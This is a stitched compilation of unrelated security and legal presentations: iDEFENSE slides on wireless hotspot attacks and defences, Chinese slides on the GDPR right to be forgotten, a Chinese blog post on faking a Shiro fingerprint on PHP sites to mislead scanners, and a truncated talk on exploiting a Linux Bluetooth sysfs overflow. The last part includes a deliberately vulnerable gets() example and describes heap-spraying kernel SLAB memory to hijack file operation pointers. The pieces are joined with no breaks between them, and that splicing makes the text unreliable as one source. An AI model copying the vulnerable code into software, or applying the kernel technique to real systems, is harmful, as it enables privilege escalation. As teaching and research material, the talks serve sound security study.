The Risks and Vulnerabilities Associated with Wireless Hotspots Michael Sutton <msutton@idefense.com> Pedram Amini <pamini@idefense.com> Hacking The Invisible Network iDEFENSE Copyright © 2003 iDEFENSE Inc. iDEFENSE Purpose • Study security from two points of view – Providers – End users • A variety of implementations – Cafés – Hotels • Tools – Laptops, Dell Axim – Hermes and Prism chipsets – Various software tools – Tolerant bladder Copyright © 2003 iDEFENSE Inc. iDEFENSE WISPs Wireless Internet Service Providers – aka Hotspots What are they? • Where are they? – Airports – Hotels – Retail stores – Coffee Shops • Why go wireless? – Cost – Convenience Copyright © 2003 iDEFENSE Inc. iDEFENSE Industry • Startups – Boingo – WayPort – NetNearU – HotSpotzz – Airpath Wireless – Surf and Sip – HereUAre – Deep Blue Wireless – Joltage (defunct) Copyright © 2003 iDEFENSE Inc. iDEFENSE Industry (cont’d) • Telecomm – T-Mobile – AT&T (Cometa) – Sprint (Boingo) • Hardware – Intel (Cometa) – IBM (Cometa) Copyright © 2003 iDEFENSE Inc. iDEFENSE Provider Risks • Business risks – Financial loss – Launch pad for anonymous attacks • Network level attacks – Privacy – Confidentiality – Data integrity • Denial of service attacks – Availability Copyright © 2003 iDEFENSE Inc. iDEFENSE End User Risks • Node vs. Network level security – “Crunchy on the outside, Chewy on the inside” • Untrusted networks – Intranet safe services – Information leakage – Spoof attacks • End user awareness Copyright © 2003 iDEFENSE Inc. iDEFENSE Security Implementations • Access control – Firewall restricts connectivity – Web requests redirected to login screen – Authentication takes place over SSL – Internet access is granted Copyright © 2003 iDEFENSE Inc. iDEFENSE Security Implementations (cont’d) Internet Access Point User 1 User 2 Web Server Internet Access Point User 1 User 2 Copyright © 2003 iDEFENSE Inc. iDEFENSE Security Implementations (cont’d) • IP address filtering – Everyone • MAC address filtering – T-Mobile • IPSec VPN – Deep Blue Wireless – Optional • DHCP lease expiration – ? Copyright © 2003 iDEFENSE Inc. iDEFENSE Revenue Loss • Tunneling data through unfiltered protocols – Bypassing access controls • Connection hijacking – Stealing legitimate connections • Connection sharing – Multiple unauthorized connections piped through one legitimate connection Copyright © 2003 iDEFENSE Inc. iDEFENSE Tunneling Internet Loki Server Firewall Gateway Access Point External Sites Loki Client ICMP Traffic IP Traffic IP Traffic Copyright © 2003 iDEFENSE Inc. iDEFENSE Internet Access Point Target IP  Y.Y.Y.Y MAC  Y:Y:Y:Y:Y:Y Permitted Attack IP  Y.Y.Y.Y MAC  Y:Y:Y:Y:Y:Y Blocked Internet Access Point Target IP  Y.Y.Y.Y MAC  Y:Y:Y:Y:Y:Y Permitted Attack IP  Y.Y.Y.Y MAC  Y:Y:Y:Y:Y:Y Permitted Internet Access Point Target IP  Y.Y.Y.Y MAC  Y:Y:Y:Y:Y:Y Blocked Attack IP  X.X.X.X MAC  X:X:X:X:X:X Permitted Connection Hijacking Copyright © 2003 iDEFENSE Inc. iDEFENSE Connection Sharing Internet Access Point Share 1 Share 2 Router Copyright © 2003 iDEFENSE Inc. iDEFENSE Network Level Attacks • Traffic monitoring – Passive attack • DNS Hijacking – Active attack • Man in the middle attacks • Auto update hijacking •Public IP addresses – WayPort – Remote attack •ARP Spoofing – Active attack •Network crossover Copyright © 2003 iDEFENSE Inc. iDEFENSE WayPort Layout Internet Linux Wayport Wayport Gateway Access Points Windows Copyright © 2003 iDEFENSE Inc. iDEFENSE Denial of Service Attacks • Physical layer (1) – Interference • Data layer (2) – ARP spoofing • Network layer (3) – AirJack Copyright © 2003 iDEFENSE Inc. iDEFENSE End User Countermeasures • VPN • Encryption w/ validation • O/S hardening • Node level firewall/IDS • Dedicated travel hardware Copyright © 2003 iDEFENSE Inc. iDEFENSE Improved WISP Security • Non Internet addressable IPs – Network Address Translation (NAT) • Filter all protocols • 802.1x • Intrusion Detection System (IDS) – Spoof detection (ARP, IP, DNS, …) • Intrusion Prevention System (IPS) Copyright © 2003 iDEFENSE Inc. iDEFENSE Questions?
1 從GDPR看言論自由與被遺忘權 中華民國電腦稽核協會 Computer Audit Association 國際電腦稽核協會 台灣分會 ISACA Taiwan Chapter service@isasa.org.tw Hacks in Taiwan Conference Community 2018 2 報告人簡歷 1 3 2 姓名 張紹斌 經歷 司法官班第33期結業 智慧財產及電腦犯罪專組主任檢察官 東吳法研所科技法律組兼任助理教授 行政院資通安全稽核委員 司法官學院講座 學歷 政治大學法律學系學士 交通大學科技法律研究所碩士 廈門大學知識產權研究院博士生 4 現職 中華民國電腦稽核協會理事長 合盛法律事務所律師 bin@hosheng-law.com 3 目錄 CONTENTS 從數位紋身發韌的隱私思考 被遺忘權起源及涉及之權利主體 人格權財產價值 被遺忘權與表現自由之調和 結論與建議 4 從數位紋身發韌的隱私思考 被遺忘權之起源 5 數位記憶對隱私的衝擊 1945 1 Vannevar Bush,在大 西洋月刊裡發 表機器複製及 擴增人類記憶 之文章 1998 2 J.D.Lasica 在 網路上發表 「網路永遠不 會忘記」之文 章 2009 3 Gordon Bell 在Total recall 書中,主張 「電子記憶革 命」能完全改 變世界 2015 4 反之,Viktor Mayer- Schönberger 害怕滴水不露 的數位記憶, 可能造就數位 版的圓形監獄 6 被遺忘權之起源 案件  歐盟法院Google Spain SL ,Google Inc. VS Agencia Española de Protección de Datos(AEPD), Mario Costeja González (2014)案判決  被遺忘權一詞係 Costeja González 所提出及主張,西班牙高等 法院亦請求歐盟法院就 Costeja González 是否有被遺忘權為先 決裁判,然而歐盟法院在判決理由內並未提及被遺忘權一詞  歐盟 2018 年 5 月 25 日生效之 GDPR 第 17 條,其條文名稱直 接標明為「刪除權(被遺忘權)」,明文承認被遺忘權權利存在 當事人 GDPR 7 歐盟法院與GDPR關於被遺忘權比較 歐盟法院 1. 被遺忘權行使對象:限定在 搜尋引擎業者 2. 行使之客體:限定在刪除搜 尋引擎搜尋結果之連結 3. 行使之例外: A. 是否基於歷史、統計或科學 目的而需要保留此個人資料 B. 是否有特別理由證明公眾獲 取該個人資料具有優勢利益。 其中所舉特別理由之例子為 個人資料主體在公共領域中 擔任特定角色 GDPR 1. 被遺忘權行使對象:包含搜尋引擎 業者、網路平台業者 2. 行使之客體:包含刪除搜尋引擎搜 尋結果之連結、刪除個人資料本身 3. 行使之例外: 第17條第3項規定之態樣: A. 為了行使表現自由權及資訊自由權之 必要範圍內 B. 依據法律 C. 為了公共健康 D. 為了儲存檔案之目的 E. 為了科學、歷史研究目的或統計目的 F. 為了法律上請求之主張、行使或防禦 更加細緻化地規定,以調和被遺忘權與其 他基本權利之衝突 8 美國關於被遺忘權之實務 • 著重言論自由,法院目前見解不承認被遺忘 權存在 • 僅有加州未成年人在數位世界之隱私權法有 限度地承認被遺忘權,惟規定僅保護18歲以 下之未成年人,且未成年人只能要求刪除自 己張貼之內容或資訊,至於第三人重新張貼 未成年人前所張貼之內容或資訊,則無法要 求刪除 9 中國大陸關於被遺忘權之實務 • 中國大陸目前尚未立法承認被遺忘權,北京 市第一中級人民法院在「任甲玉」與百度民 事訴訟案,雖不採納原告被遺忘權之主張, 然提出3個判斷標準: 1. 非類型化權利涵蓋之利益 2. 具有利益的正當性 3. 具有保護的必要性 • 不能排除此3個判斷標準可作為將來被遺忘 權案件之判決標準 10 日本關於被遺忘權之實務 • 目前亦未立法承認被遺忘權,最高裁判所在逆轉事件 裁判,可認為係承認被遺忘權 • 最高裁判所在2017年(平成29年)1月31日搜尋引擎 業者案件,就隱私權與表現自由間衝突之衡量,提出 下列判斷標準: 1. 個人資料內容之性質 2. 因提供連結,該個人資料被傳送之範圍及個人資料主體受 到具體的損害程度 3. 個人資料主體社會地位或影響力 4. 個人資料刊登、利用之目的或意義及其必要性 5. 個人資料刊登、利用當時之社會狀況與其後之變化 6. 個人資料內容顯示個人資料主體之行為,是否受到社會的 強烈非難,及該行為是否係以刑罰禁止 因此日本法院並未完全否定被遺忘權存在,上開考量 因素亦可作為將來被遺忘權案件之判決標準 11 我國關於被遺忘權之實務案例 12 我國關於被遺忘權之實務案例 1 • 施建新訴Google案(搜尋引擎業者) 1. 臺北地方法院103年訴字第2976號民事判決 2. 2017.7.7 臺北地方法院104年度訴更一字第31號民事判決 3. 2018.6.20 高等法院106年度上字第1160號民事判決 • 周宗源訴蘋果日報案(原出版者) • 施建新訴自由時報案(原出版者) 13 我國關於被遺忘權之實務案例 2 • 臺北地方法院103年訴字第2976號民事判決 1. Google Inc.並非經濟部所許可營業的公司, Google 台 灣分公司與 Google Inc.分屬不同法人格,而 Google Inc.未授權 Google 台灣分公司管理 Google 搜尋引擎之 權能;不能因為在我國得使用 Google 搜尋服務就推論 Google 搜尋引擎之資料之蒐集、處理行為在我國為之。 被告Google 台灣分公司就本案訴訟標的並無實施權能, 本案當事人不適格 2. 民法 191-1 條之規範對象並不包括「服務提供者」;且 消保法的保護法益限於生命、身體、健康、財產,而不 及於名譽權、隱私權,原告的主張不可採。原告於第一 次言詞辯論期日後主張追加 Google Inc.為當事人,法院 仍以不符合追加之要件駁回 14 我國關於被遺忘權之實務 3 • 施建新訴Google案(106年度上字第1160號) • 高等法院衡量標準: 1. 搜尋結果所連結內容之資訊目的 2. 公開資訊之目的及其社會意義 3. 要求刪除事項之性質是否與公共利益有關 4. 公開資訊對被害人造成損害之程度 5. 個資主體以何種行為導致發生此種侵害 6. 個資主體是否為公眾人物 15 我國關於被遺忘權之實務 4 • 施建新訴Google案( 106年度上字第1160號) • 高院認為敗訴理由: 1. 被告自願為眾所周知之公眾人物,本受一般民眾較大之關 注,其隱私權保障範圍自應為退縮 2. 假球案為我國職棒發展史上重要的歷史事件,始終為國內 外關注之公共事務 3. 未揭露經濟資料、家人姓名或使其家人暴露於危險之資料 4. 搜尋引擎保障公眾知的權利,促進民主進步與發展,具有 公共利益 5. 文章內容正確性無爭議,且具實現公眾之言論自由表現, 並滿足群眾對於知之需求之特定目的未消失,不符個資法 第11條第3項規定 16 被遺忘權之其他法制實務 • 歐盟電子商務指令、美國數位千禧年著作權法、 中國大陸侵權責任法第36條、信息網絡傳播權 保護條例及日本Provider責任限制法對於網路服 務提供者,均採取限制責任的態度,並均有類似 之通知、取下義務規定 • 此等規定如可應用在被遺忘權之行使,使被遺忘 權權利人無須針對個別網頁內容發布者查察與訴 追,可直接通知網路平台業者、搜尋引擎業者刪 除內容或刪除連結,亦可引為保護被遺忘權之規 定 17 被遺忘權涉及之權利主體 18 18 搜尋引擎業者 網路平台業者 刊登個人資料主體之 個人資料之第三人 個人資料主體本身(個資當事人) 19 被遺忘權涉及之主體 01 02 03 04 第三人僅單純重新張貼個 人資料主體前張貼之個人 資料­未自己再添加想法、 論述等,難認有侵害其表 現自由。依個資法第19條 之規定,個人資料雖取自 於一般可得之來源,但蒐 集仍需有特定目的,因此 並非任意第三人之蒐集均 有符合特定目的;且第三 人重新張貼之行為,屬於 個人資料之利用,依個資 法第20條之規定,原則上 未經個人資料主體同意不 能加以利用。應有權請求 第三人刪除該個人資料 第三人張貼資料類型 基於個資當事人之個資有 自決權,且參酌個資法第 5條亦規定個人資料之蒐 集、處理或利用,應尊重 當事人之權益。因此個人 資料主體應可請求網路平 台業者刪除或停止利用其 個人資料 個資主體自行公開類型 搜尋引擎業者預先、大量 抓取網路上的資料,廣泛 預先蒐集他人個人資料­, 有無違目的限制原則、資 料最少蒐集原則、目的拘 束原則? 若為網路服務提供者與使 用者間係私法上的契約關 係。且多數網路服務提供 者具營利性質,大多係直 接或間接利用個人資料獲 利 搜尋引擎業者揭露類型 第三人在網路上張貼有關 某個人資料主體之評論, 及新聞媒體在其網站上刊 登有關個人資料主體之新 聞­,即涉及到與表現自 由之間的衝突,爭議最大, 需進一步探討以何判斷標 準決定何權利勝出,及如 何調和兩者間之衝突 以新聞媒體刊登類型 20 被遺忘權行使之程度 刪除本文 刪除資料庫所有資料 刪除超連結 21 人格權的財產價值 22 人格權之財產價值 01 人格權因具有一身專屬性,而具有不可讓與性、不可繼承性 02 美國法上 Right of Publicity(個人公開權)、德國聯邦最高法院,均 承認人格權之財產價值,而得讓與及繼承 03 我國繼受大陸法系,於近幾年仍舊遵循上開人格權之傳統見解,其後最 高法院104年度台上字第1407號判決,首次承認姓名、肖像等人格特徵 之財產價值,而得繼承,然未一併論及繼承之權利保護期間、可讓與性 及如何行使權利 傳統 見解 美國 實務 我國 現況 23 人格權之財產價值與數位遺產 facebook 人格權 數位遺產 未成年 成年 Facebook 使用者過世後,繼承人可 否繼承本人帳號,查看本人訊息 平台營運者或是服務提供者有權利讓他們登入嗎?死 者在 Facebook 等社群網路上可能有一群朋友,這些人 和死者分享資訊,而不是和死者的親友分享資訊 柏林地區法院法官判決 Facebook 帳號算是未成年子女的「數位遺產」,而數位遺產應該要 和實體遺產一樣都可以被繼承,否則就會發生人們可以繼承死者的書信和日記,但卻無法 繼承他們的電子郵件和 Facebook 帳號這樣不合理的情況 24 被遺忘權與表現自由 25 兩者調和判斷方法:公共利益 此兩號解釋,就細節部分或有不同,然判斷權利間衝突之衡量標準, 均不脫離「公共利益」此要件。被遺忘權既屬於人格權之一種,應 參酌此兩解釋,以「公共利益」來衡量、調和被遺忘權與言論自由、 新聞自由間之衝突 03 釋字第689號探討的客體,係社會秩序維護法第89條第2款無正當理 由跟追他人,經勸阻不聽之處罰之合憲性,係以報導內容之「公益 性」、「具有新聞價值」,及跟追行為是否「逾越依社會通念所認 不能容忍之界限」來衡量、調和新聞自由及身體權、自由權、隱私 權等人格權及個人資訊自決權之衝突 02 釋字第509號探討的客體,係以刑法第310條誹謗罪之合憲性,透過 「真實性」及「公共利益」來衡量、調和言論自由及人格權、名譽 權之衝突 01 26 判斷公共利益應考慮之重要因素 被遺忘權並未禁止、限制他人一開 始於網站刊登特定人個人資料,亦 未禁止、限制他人24小時全年無 休、持續不斷發布該個人資料,不 斷行使言論自由、新聞自由;僅要 求在一段時間過後,例如30年、 40年後禁止再行發布該個人資料。 此時「新聞」已經變成舊聞、歷史, 原出版者可能也已去世,或自己亦 遺忘曾經刊登過該個人資料,甚至 被悄然刪除其張貼之個人資料,亦 不知道、無感,此時甚難說該人在 30年、40年後仍有意識地行使其 言論自由或新聞自由 發佈時間 應重視時間經過這個重要因 素,以他人於網站刊登特定 人個人資料為例,其第一次 於網站刊登特定人個人資料, 縱認係符合公共利益,然30 年、40年後可能就不符合公 共利益,例如當時係演藝人 員,30年、40年後已脫離演 藝圈甚久 持續時間 27 判斷公共利益之研究心得 判斷公共利益因素 我國、歐盟法院、中國大陸、日本 法院判決實務、歐盟資料保護工作 小組指導方針、GDPR規定…… 一. 個人資料主體是否為未成年人 二. 個人資料主體社會地位或影響力 三. 該個人資料是否具歷史意義或社會意義 四. 該個人資料是否可以保護民眾免於不適當的公眾或專業的 行為 五. 該個人資料是否為真正的隱私 六. 該個人資料是否仍係公眾關注或辯論的主題 七. 該個人資料是否會置個人資料主體或其家庭成員於危險中 八. 個人資料如係犯罪行為,其輕重程度 九. 是否係為了科學或統計或公共健康之目的 十. 該個人資料是否會妨礙個人資料主體更生 十一. 該個人資料所涉及者是否僅為特定人之個人權益 十二. 該個人資料是否會對公眾產生廣泛影響 28 判斷公共利益後之再調和 • 經判斷結果符合公共利益,並非指 對於已公開、刊登之個人資料不得 為任何主張,可再為進一步之調和, 例如雖然仍需刊登該個人資料,惟 可隱匿個人資料主體之姓名、去識 別化,僅於「必要範圍內」公開、 刊登個人資料,亦即非只要符合公 共利益,就可鉅細靡遺地公開特定 個人資料主體之個人資料 公共利益與去識別化 29 有效保護被遺忘權之方式 1 被遺 忘權 1 2 3 著作權法之網路服務提供者限制責任 個人資料主體欲刪除之個人資料,如係個人資 料主體以文學性或具有原創性之方式揭露有關 隱私或個人資料之內容,有可能適用我國著作 權法通知、取下義務之規定 若認欲刪除之個人資料未具著作權之要件,著作權法第 90條之10則係規定網路服務提供者對涉有侵權之使用者 之限制責任,未增加網路服務提供者之義務,為鼓勵網 路服務提供者於主動或經個人資料主體通知而知悉可能 符合被遺忘權要件時,採取適當之措施,似有類推適用 之必要及可能 30 有效保護被遺忘權之方式 2 01 02 03 消費者保護法定型化契約應記載事項 網路服務提供者與使用者之間,係屬私法上的契約關係,網路服 務提供者多有公告其服務條款 依消保法第17條,中央主管機關報請行政院核定後公告之定型化契約 應記載或不得記載事項,其中應記載之事項,雖未記載於定型化契約, 仍構成契約之內容。因此中央主管機關可將被遺忘權之定義、要件及 網路服務提供者得依據個人資料主體通知後移除或使他人無法進入該 個人資料之內容等,規定為網路服務提供者服務條款之應記載事項; 此時縱使網路服務提供者之服務條款未規定,仍構成契約之內容,使 網路服務提供者得依據該規定刪除個人資料主體以外之人所張貼、刊 登之個人資料內容,或刪除連結 31 有效保護被遺忘權之方式 3 信息網絡傳播權保護條 例(大陸2013.3.1) 法院組織法第83條 在被遺忘權訴訟案件之裁 判書,雖不符合第1項但 書可不公開個人資料主體 姓名、案件內容等全部資 料,可依第2項之規定, 在公開個人資料主體姓名 下,不予公開個人資料主 體所欲刪除之個人資料, 如此不特定第三人始無法 藉由查詢裁判書之方式, 再次記起個人資料主體所 欲刪除之個人資料 法院組織法第86條 在被遺忘權訴訟案件之審 理程序,法院宜依本條但 書規定,不予公開審理, 以避免旁聽之人得知個人 資料主體所欲刪除之個人 資料 適用結果 如法院能運用法院組織法 上開兩規定,應可適度避 免史翠珊效應,避免個人 資料主體本欲他人遺忘其 個人資料,然經由公開審 理、公開裁判書方式,反 而造成更多人知悉該個人 資料 32 被遺忘權行使權利之方式 • 網路平台業者提供大量他人個人資 料創造瀏覽量,吸引廣告主支付一 定價金,賺得廣告收益,此與美國 公開權、德國聯邦法院所適用案例 之特徵相當,應認得主張不當得利 請求權 • 然所謂應返還之利益,可能係指就 個人資料之使用,相當於授權金之 報酬,因此不能請求返還商業使用 獲得之利益,如此不足以合理保護 被遺忘權,如經被遺忘權權利人通 知移除相關個人資料,仍故意擅自 繼續使用該個人資料作為商業使用 時,應符合民法第177條第2項不法 管理之要件,權利人得請求扣除必 要支出後返還商業使用獲得之一切 利益 2.不當得利及無因管理 1.刪除權 • 依民法第18條第1項請求刪除,或依據個資法 第11條第3項、第4項、第19條第2項規定,請 求刪除、停止處理或利用該個人資料,兩者為 請求權競合之關係 3.非財產上損害賠償請求權 • 容許主張被遺忘權之案例,通常已嚴重影響權 利人名譽、信用等,甚至在社會中生存之可能, 因此難謂非情節重大,是被遺忘權可認為屬於 民法第195條第1項前段所稱其他人格法益,而 容許權利人得主張非財產上之損害,向加害人 請求慰撫金 33 敬請指導 2018
2021/10/28 让你的php⽹站拥有shiro - depy https://blog.happysec.cn/index/view/366.jsp 1/6 depy 让你的php网站拥有shiro 2021年10月28日 / 网络安全 前言 很久很久以前freebuf发过一篇通过shiro反序列化拿下php网站的文章后,我大 受震撼,震撼到今天。 我今天花了一下午摸鱼做这个实验。实验非常简单,也就是我们如何让php网站 收到shiro探测的请求后让工具或脚本认为这是一个有shiro框架的网站?如何收 到密钥爆破检测请求的时候,通过请求的字段值来与后端密钥做匹配,更加逼真的 还原密钥爆破的场景,从而让脚本小子继续误入歧途? Shiro框架指纹 shiro常见的指纹是通过请求包设置cookie中一个值为RememberMe=xxx,返 回到有相应的Set-Cookie: rememberMe=deleteMe。这是最常见的指纹了, 我们的目的是防御,而不是攻击,所以设置一个最常见的即可。 这里我拿j1anfen师傅的shiro测试工具来测试。通过原理,我们可以自己给网站 base文件或者中间件写这样的代码(这里以及下文都是以php网站为例) 2021/10/28 让你的php⽹站拥有shiro - depy https://blog.happysec.cn/index/view/366.jsp 2/6 php用$_COOKIE函数取值会使+号变成空格,这里通过headers遍历重新取值可 以解决这个问题。于是我们用j1anfen师傅的工具探测一下 发现已经可以让大多数工具认为我的网站是shiro框架了,但这还太简陋了。 Shiro框架密钥爆破原理 我们能不能更逼真点呢? 比如说我php网站后台指定一个密钥,你爆破密钥的时候必须和我php后台配置的 密钥一致,再设置相应的回显? https://mp.weixin.qq.com/s/do88_4Td1CSeKLmFqhGCuQ 2021/10/28 让你的php⽹站拥有shiro - depy https://blog.happysec.cn/index/view/366.jsp 3/6 现在非常多的工具都是构造一个继承 PrincipalCollection 的序列化对象,key 正确情况下不返回 deleteMe ,key错误情况下返回 deleteMe 的方式来判断ke y是否正确。 那么,当我们取值取到一个由密钥kPH+bIxk5D2deZiIxcaaaA==加密而来探测 的rememberme,我们后端配置的密钥也是kPH+bIxk5D2deZiIxcaaaA==, 我们应该怎么做呢? 首先,老版本的shiro是aes-cbc加密,padding是Pkcs7。上面key探测的方法 用到了反序列化,那么解密出来的数据一定会存在反序列化的特征 aced0005 所以我们可以给后台写一下php对于aes-cbc pkcs7的解密,一开始我对aes的加 密不是很熟悉。因为cbc模式下是有偏移量的,但我们并没有偏移量,让我困惑 了很久为什么一个密钥就可以进行反序列化。 还是万能的小何和我说的 2021/10/28 让你的php⽹站拥有shiro - depy https://blog.happysec.cn/index/view/366.jsp 4/6 所以思路就很明确了: 1. php网站收到请求中的rememberme字段值 2. 后台存在一个我们假定的key,并使用aes-cbc解密,如果密钥匹配正确,那 么解密出来的hex字符串的32-40位的字符串应该是aced0005。 3. 如果解密出来的数据是aced0005,那么我们就不设置deleteme的头部字段。 4. 其他情况下如果存在rememberme的请求cookie,就设置。 解密脚本如下 上面的pkcs7unpadding用不用结果都会有特征,去掉也行。 最终效果如下 2021/10/28 让你的php⽹站拥有shiro - depy https://blog.happysec.cn/index/view/366.jsp 5/6 成果 2021/10/28 让你的php⽹站拥有shiro - depy https://blog.happysec.cn/index/view/366.jsp 6/6 由于本人技术水平有限,一下午只能研究这么多了。后续伪造利用链,伪造回显 可以继续深入研究,该继续挖漏洞了。 光是aes解密那个部分就想了很久,一开始用的是nginx来直接配置shiro相关特 征,发现我并不太行,我太菜了。 如果还有其他的伪造,其实可以用伪静态设置后缀为jsp,亦或者修改phpsessio n,改成jsessionid。 如有错误,请指正轻喷。 ^^
From “No Way” to 0-day: Weaponizing the Unweaponizable Joshua Wise 1 “...you’re de0uing it wrong...” Outline • Intro • Vulnerabilities: in general - What makes something easy to exploit? • Vulnerabilities: a case study - Making something hard into something doable • Briefly -- what went wrong? - How did this sort of thing happen? • Q & A 2 Intro: Me • Just some guy, you know? • All-purpose embedded hacker - Got roped into Android at some point • Recovering software guy - Now doing ASIC design • Buzzword compliant - Working on IMB in ECE at CMU 3 unrevoked Intro: You • At least a little bit of kernel experience? • Interested in security? • Not a skript kiddie - No code for you to compile here - Enough description for a skilled programmer to repro this 4 image: me, 12 years old Today’s vulnerability • While looking for ways to root Android phones, came across... - CVE-2010-1084 • “CVE request: kernel: bluetooth: potential bad memory access with sysfs files” - “...allows attackers to cause a denial of service (memory corruption)” • First showed up in 2.6.18, fixed in 2.6.33 - ...ouch! - Raise your hand if you haven’t patched up to 2.6.33 yet 5 Mechanism of crash • Classic vulnerability - for each Bluetooth socket, sprintf() onto the end of a string in a buffer - no check for end of buffer • With a twist - gets the buffer from the frame allocator; scribbles into next frame (uncontrolled target) - contents not controlled - length only kind of controlled 6 Yesterday’s vulnerability • Refresher: easy vulnerability • Simple stack smash: void cs101_greeter() { // prof said it has 2 be setuid root 4 term axx char buf[1024]; printf(“What is your name?\n”); gets(buf); // my prof said not to use gets(3) printf(“Hello, %s!\n”, buf);// so i used gets(buf), thats ok rite? } • Easily exploitable properties - Controlled target - Controlled length - Controlled contents (with a few limitations) 7 Watch that stack! • What happens next? - “User” inputs something bad. • Where does it go? 8 Watch that stack! • What happens next? - “User” inputs something bad. • Where does it go? 9 main()’s stack frame 0xC0000000 ... return addr for greeter() other BS for greeter() 0xBFFF8008 buf 0xBFFF8004 0xBFFF8000 0xBFFF7C00 gets()’s stack frame ! These addresses are for no machine in particular! Watch that stack! • What happens next? - “User” inputs something bad. • Where does it go? 10 main()’s stack frame 0xC0000000 ... return addr for greeter() other BS for greeter() 0xBFFF8008 buf 0xBFFF8004 0xBFFF8000 0xBFFF7C00 gets()’s stack frame ! These addresses are for no machine in particular! $ /afs/cs/course/15123-sfnoob/usr\ /aashat/bin/greeter What is your name? AAAAAAAAAAAAA...∆∫∆∂œåµƒ... Hello, AAAAAAAAA... [+] pwned # Watch that stack! • What happens next? - “User” inputs something bad. • Where does it go? 11 main()’s stack frame ... return addr for greeter() other BS for greeter() buf gets()’s stack frame $ /afs/cs/course/15123-sfnoob/usr\ /aashat/bin/greeter What is your name? AAAAAAAAAAAAA...∆∫∆∂œåµƒ... Hello, AAAAAAAAA... [+] pwned # now contains code! now contains address of code in buf! Why did that work so well? • Remember the three controls: - Attacker-controlled target • Always blast the ret addr - same memory each time - Attacker-controlled length • We never blast off the end of the stack into segfaultland - Attacker-controlled contents • Write anything we want but 0x00 and ’\n’ 12 From yesterday comes tomorrow • Today’s exploit, at its core: - (for those of you following along at home, in l2cap_sysfs_show) - str = get_zeroed_page(GFP_KERNEL); ... for each l2cap_sk_list as sk: str += sprintf(str, "%s %s %d %d 0x%4.4x 0x%4.4x %d %d %d\n" batostr(&bt_sk(sk)->src),...); • What year is it? I seem to have forgotten 13 sprintf() out of control • Issue is obvious, and crash is inevitable -- but what of our three controls? • Controlled target - How is buf allocated? • sysfs buffer comes from frame allocator - What comes after? • Some other poor noob’s frame! 14 (aside: frames and pages) • Frames are physical memory backings of pages. - Don’t confuse with ‘stack frames’! • Pages are chunks of virtual memory. 15 Process A pages 0xBFFFF000 Stack .text .data ! 0x8C028000 0x8C020000 ... ... Process B pages 0xBFFFF000 Stack .text .data 0x8C028000 0x8C020000 ... ... Physical memory frames • Linux kernel has both mapped into A.S.! • Needed for frame allocations (__GFP_KERNEL) -- more later A Stack A .data Kernel code Shared .text B Stack sprintf() out of control • Issue is obvious, and crash is inevitable -- but what of our three controls? • Controlled length - Writes take place through a sprintf() to a strange place - We can’t stop it before it smashes something else 16 sprintf() out of control • Issue is obvious, and crash is inevitable -- but what of our three controls? • Controlled contents - No data comes directly from us - All data comes formatted 17 sprintf() out of control • Issue is obvious, and crash is inevitable -- but what of our three controls? • Zero for three! • Now would be a good time to start controlling our environment. 18 Target practice • How can we control the target? • Let’s use an old-fashioned heap spray. - ...but what? - First idea: kstack! • It worked so well in CS101, right? 19 “With Emarhavil, your target is our target.” Jenga • Let’s assume: - kernel stack is the frame after the sysfs page - we know which pid the kstack belongs to • Given that, what happens? - What does a kstack even look like? 20 Jenga • Like other stacks, a kstack has stack frames • Unlike other stacks, a kstack has a TCB attached to it! 21 str 0x782F2000 0x782F3000 thread control block the abyss some poor dude’s stack ~0x782F3100 ~0x782F3DE8 return address more stack frames, reg saves... 0x782F4000 ~0x782F3E80 ~0x782F3E84 ! ... Jenga • What happens when we write? 22 str 0x782F2000 0x782F3000 thread control block the abyss some poor dude’s stack ~0x782F3100 ~0x782F3DE8 return address more stack frames, reg saves... 0x782F4000 ~0x782F3E80 ~0x782F3E84 ... sprintf(str, “ownedownedownedowned” “ownedownedownedowned” ...); ! Jenga • What happens when we write? 23 str 0x782F2000 0x782F3000 thread control block the abyss some poor dude’s stack ~0x782F3100 ~0x782F3DE8 return address more stack frames, reg saves... 0x782F4000 ~0x782F3E80 ~0x782F3E84 ... sprintf(str, “ownedownedownedowned” “ownedownedownedowned” ...); ownedownedownedownedownedowned ownedownedownedownedowned Jenga • What happens when we write? - TCB is clobbered! - Could be OK; this time not. 24 str 0x782F2000 0x782F3000 thread control block the abyss some poor dude’s stack ~0x782F3100 ~0x782F3DE8 return address more stack frames, reg saves... 0x782F4000 ~0x782F3E80 ~0x782F3E84 ... sprintf(buf, “ownedownedownedowned” “ownedownedownedowned” ...); ownedownedownedownedownedowned ownedownedownedownedowned Getting physical • What else goes in physical frames? • Linux kernel has interesting mechanism called SLAB allocator - Creates uniform “caches” of specific objects • conveniently, frame-sized! - Localizes similar objects in memory - Avoids expensive variable-size allocation - Originally designed by the Sun guys 25 free slot SLABs of memory • What’s in a SLAB? • Where’s the list of SLABs available? - SLAB metadata stored in... a SLAB! 26 in-use object free slot free slot in-use object free slot in-use object free slot frame boundary frame boundary frame boundary pointer to next free slot pointer to first free slot NULL NULL free slot SLABs of memory • What’s in a SLAB? • No per-SLAB header - Convenient... 27 in-use object free slot free slot in-use object free slot in-use object free slot frame boundary frame boundary frame boundary NULL NULL free slot SLABs of memory • What’s in a SLAB? • No per-SLAB header - Convenient... 28 in-use object free slot free slot in-use object free slot in-use object free slot frame boundary frame boundary frame boundary NULL NULL str (hum de dum) Who eats SLABs? • Pretty much every kernel subsystem - joshua@escape:~/linux$ find . | \ xargs grep kmem_cache_alloc | \ wc -l 305 - joshua@nyus:/proc$ cat slabinfo | wc -l 183 • Something in there has to be an easy target • How about... file descriptors? - Stored in struct file, in SLABs 29 Filed away for reference • What does a struct file look like? - struct file { union {...} f_u; /* morally, two pointers */ struct path f_path; /* morally, two pointers */ struct file_operations *f_op; unsigned int f_count, f_flags, f_mode; ... } struct file_operations { struct module *owner; loff_t (*llseek)(...); ssize_t (*read)(...); ssize_t (*write)(...); ssize_t (*aio_read)(...); 30 Filed away for reference 31 • What does a struct file look like? - (best case!) f_u frame boundary remember, this is at the start of a SLAB! f_u f_path f_path f_op f_count f_flags each block is one pointer size f_mode ... Filed away for reference 32 • What does a struct file look like? - (really really best case!) f_u frame boundary remember, this is at the start of a SLAB! f_u f_path f_path f_op f_count f_flags f_mode str (hum de dum) get_zeroed_page comes from same pool as SLABs (more later) ... Filed away for reference 33 • What does a struct file look like? - Parts that the kernel can survive for a little while without darkened f_u frame boundary remember, this is at the start of a SLAB! f_u f_path f_path f_op f_count f_flags ... f_mode str (hum de dum) get_zeroed_page comes from same pool as SLABs (more later) Great news! 34 Great news! 35 • In essence -- struct file can be paved over at will - ... just as long as we get a reasonable value into f_op. f_u f_u f_path f_path f_op f_count f_flags ... f_mode str (hum de dum) One for three • Remember the three controls: - Attacker-controlled length 